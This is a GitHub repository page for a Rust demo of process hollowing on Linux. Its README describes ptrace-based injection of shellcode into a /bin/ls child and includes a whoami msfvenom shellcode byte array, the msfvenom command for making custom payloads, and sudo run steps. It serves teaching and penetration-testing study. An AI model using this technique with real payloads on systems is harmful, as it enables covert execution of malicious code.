Skip to content

affix/rusty-hollow

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
src
src
 
 
.gitignore
.gitignore
 
 
Cargo.lock
Cargo.lock
 
 
Cargo.toml
Cargo.toml
 
 
README.md
README.md
 
 

Repository files navigation

Process Hollowing on Unix with Rust

This repository provides an example of process hollowing on Unix systems implemented in Rust. Process hollowing is a technique often used in penetration testing and malware development where an executable process is started and its memory is replaced with arbitrary shellcode, effectively "hollowing out" the original process.

In this example, the process /bin/ls is hollowed and replaced with shellcode. By default, the shellcode executes the whoami command, generated using msfvenom.

Features

  • Demonstrates process hollowing on Unix systems using Rust.
  • Uses ptrace for memory manipulation and process control.
  • Executes arbitrary shellcode within the hollowed process.

Shellcode Details

By default, the shellcode used in this example is a whoami shellcode, generated by msfvenom. It prints the current user's username when executed.

The shellcode is pre-generated and included directly in the code as a byte array:

let shellcode: [u8; 43] = [
    0x48, 0xb8, 0x2f, 0x62, 0x69, 0x6e, 0x2f,
    0x73, 0x68, 0x00, 0x99, 0x50, 0x54, 0x5f, 0x52, 0x66, 0x68, 0x2d, 0x63,
    0x54, 0x5e, 0x52, 0xe8, 0x07, 0x00, 0x00, 0x00, 0x77, 0x68, 0x6f, 0x61,
    0x6d, 0x69, 0x00, 0x56, 0x57, 0x54, 0x5e, 0x6a, 0x3b, 0x58, 0x0f, 0x05
];

This shellcode can be replaced with any custom shellcode for testing purposes.

Prerequisites

  • Rust: Ensure you have the Rust toolchain installed. Visit rust-lang.org for installation instructions.
  • Unix-based OS: This example is designed for Unix systems (e.g., Linux).

Generating Custom Shellcode

To generate your own shellcode (e.g., with msfvenom):

msfvenom -p linux/x64/exec CMD=whoami -f rust

Replace the default shellcode in the source code with your generated shellcode.

How It Works

  • Forking a Child Process: The program forks the current process into a parent and child.
  • Tracing the Child: The child process is started under ptrace for debugging.
  • Executing /bin/ls: The child process executes /bin/ls using execve as a placeholder process.
  • Injecting Shellcode: The parent process writes the shellcode to the child process's memory at its instruction pointer (RIP).
  • Resuming the Process: The parent process resumes the execution of the hollowed child process, running the shellcode.

Usage

Clone the repository:

git clone <repository_url>
cd <repository_directory>

Build the project:

cargo build --release

Run the binary with root privileges:

sudo ./target/release/process_hollowing

Observe the output:

The parent process will print logs showing the memory manipulation and injection. The hollowed process will execute the whoami shellcode, printing the username of the current user.

#Example Output

I'm the parent! My child is 12345
Child stopped: Stopped(PtraceEvent)
RIP: 0x7fffabcde000
Writing shellcode to child process...
Wrote chunk to 0x7fffabcde000: 0x68732f2f6e69622f
...
Shellcode written!
root

Disclaimer

This project is for educational purposes only. Misuse of this code can result in legal and ethical consequences. Always ensure you have explicit permission before using techniques like process hollowing.

About

Unix Process hollowing in rust

Resources

Readme
Activity

Stars

20 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages